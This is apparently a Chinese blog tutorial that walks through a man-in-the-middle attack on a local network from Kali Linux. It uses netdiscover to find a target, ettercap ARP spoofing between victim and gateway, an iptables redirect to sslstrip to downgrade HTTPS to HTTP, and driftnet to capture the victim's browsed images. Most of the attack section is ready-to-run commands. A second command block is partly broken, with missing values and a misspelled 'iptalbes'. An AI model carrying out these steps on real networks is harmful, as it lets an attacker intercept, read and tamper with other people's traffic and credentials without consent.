环境准备:kali系统

  因为kali系统自带ettercap,比较方便, 不需要安装

  ifcofing命令查看当前网关 ,当前的IP是: 172.16.42.1

  查找局域网所有主机

  通过netdiscover获取到当前目标IP:172.16.42.131

  启动ettercap

  启动ettercap , wlan0为网卡端口, -T为文字显示, -M art:remote为双向arp欺骗, /172.16.42.131//为攻击的目标机器IP , /172.16.42.1//为网关地址(注, 在不同系统和不同的ettercap版本中, 参数可能不一样, 具体要看你的环境和ettercap版本)

ettercap -i wlan0 -T -M arp:remote /172.16.42.131// /172.16.42.1//

  过滤https协议成http

  重新打开一个命令行窗口,分别执行下面三个命令行,

  echo 1 > /proc/sys/net/ipv4/ip_forward   开启数据重定向

  iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 10000  开启80端口的数据转发到10000端口

  sslstrip -l 10000  执行sslstrip欺骗,把网页中的https协议转换为http协议

echo  > /proc/sys/net/ipv4/ip_forward 
iptalbes -t nat -F //清除类型为nat的iptables

iptables -t nat -A PREROUTING -p tcp --destination-port  -j REDIRECT --to-ports

sslstrip -l 10000
iptables -t nat -L //查看iptables列表是否生效






  当用户浏览的网页中包含https协议,会被转化为http协议的请求


  但是sslstrip也不是万能的, 假如网页中没有https, 但是js代码绑定了跳转到https的协议请求的事件, , 那么sslstrip就失效了


  如果用户打开网页的时候请求就是https, 会导致证书认证失败, 网页一直打不开


  获取所有的图片信息


  执行arp欺骗以后, 目标机器所有的流量都会走我们的主机, 通过监听wlan0网卡, 我们可以获取和篡改目标机器的所有http请求数据和内容


  启动driftnet监听wlan0端口, 查看所有的浏览图片数据, 所有的浏览图片,尽收眼底:




driftnet -i wlan0






作者: NONO 
出处:http://www.cnblogs.com/diligenceday/ 
企业网站:http://www.idrwl.com/	
开源博客:http://www.github.com/sqqihao
QQ:287101329 
微信:18101055830
												


																

最新文章
	

    
						
  1. linux下重启服务命令
		
    2. 
						
  2. Markdown常用语法
		
    3. 
						
  3. Thread系列之Thread.Sleep(0)
		
    4. 
						
  4. iOS-Objective-C内存管理
		
    5. 
						
  5. 005商城项目:ssm框架的整合成功之后的问题:使用maven的tomcat插件时的debug
		
    6. 
						
  6. smartjs - DataManager 场景示例分析 - 数据懒加载
		
    7. 
						
  7. HDU 4614 Vases and Flowers(线段树+二分)
		
    8. 
						
  8. 互联网产品设计常用文档类型-BRD、MRD、PRD、FSD (
		
    9. 
						
  9. 八、android jni 之C语言基础
		
    10. 
						
  10. iOS: 关于Certificate、Provisioning Profile、App ID的介绍及其之间的关系
		
    11. 
						
  11. 在浏览器中就可以写F#程序了,你试试吧
		
    12. 
						
  12. 2013 吉林通化邀请赛 Tutor 有点坑的水题
		
    13. 
						
  13. Windows Server 2003下配置IIS6.0+php5+MySql5+PHPMyAdmin环境
		
    14. 
						
  14. HTML 学习笔记 JQuery(表单,表格 操作)
		
    15. 
						
  15. 20145237 实验五《Java网络编程》
		
    16. 
						
  16. [c#.net]未能加载文件或程序集“”或它的某一个依赖项。系统找不到指定的文件
		
    17. 
						
  17. VS2015工具箱不出现ArcGIS Windows Forms怎么办?
		
    18. 
						
  18. No goals have been specified for this build. You must specify a valid lifecycle phase or a goal in the format <plugin-prefix>:<goal> or <plugin-group-id>:<plugin-artifact-id>[:<plugin-version>]:<goal
		
    19. 
						
  19. 解题:NOI 2012 骑行川藏
		
    20. 
						
  20. IE下常见兼容性问题总结
		
    21. 
		

	


热门文章
	

    
									
  1. Connections between cities
			
    2. 
						
  2. 初入红尘——在安联IT实习的一点感受(未完......)
			
    3. 
						
  3. ASP.NET Core的身份认证框架IdentityServer4(3)-术语的解释
			
    4. 
						
  4. C#  group 子句
			
    5. 
						
  5. android版火狐调试器
			
    6. 
						
  6. vue.js项目安装
			
    7. 
						
  7. Python 面向对象基础知识
			
    8. 
						
  8. python 小白(无编程基础,无计算机基础)的开发之路 辅助知识1  with...as
			
    9. 
						
  9. Vue浅谈
			
    10. 
						
  10. Hibernate从零开始的反向工程
			
    11.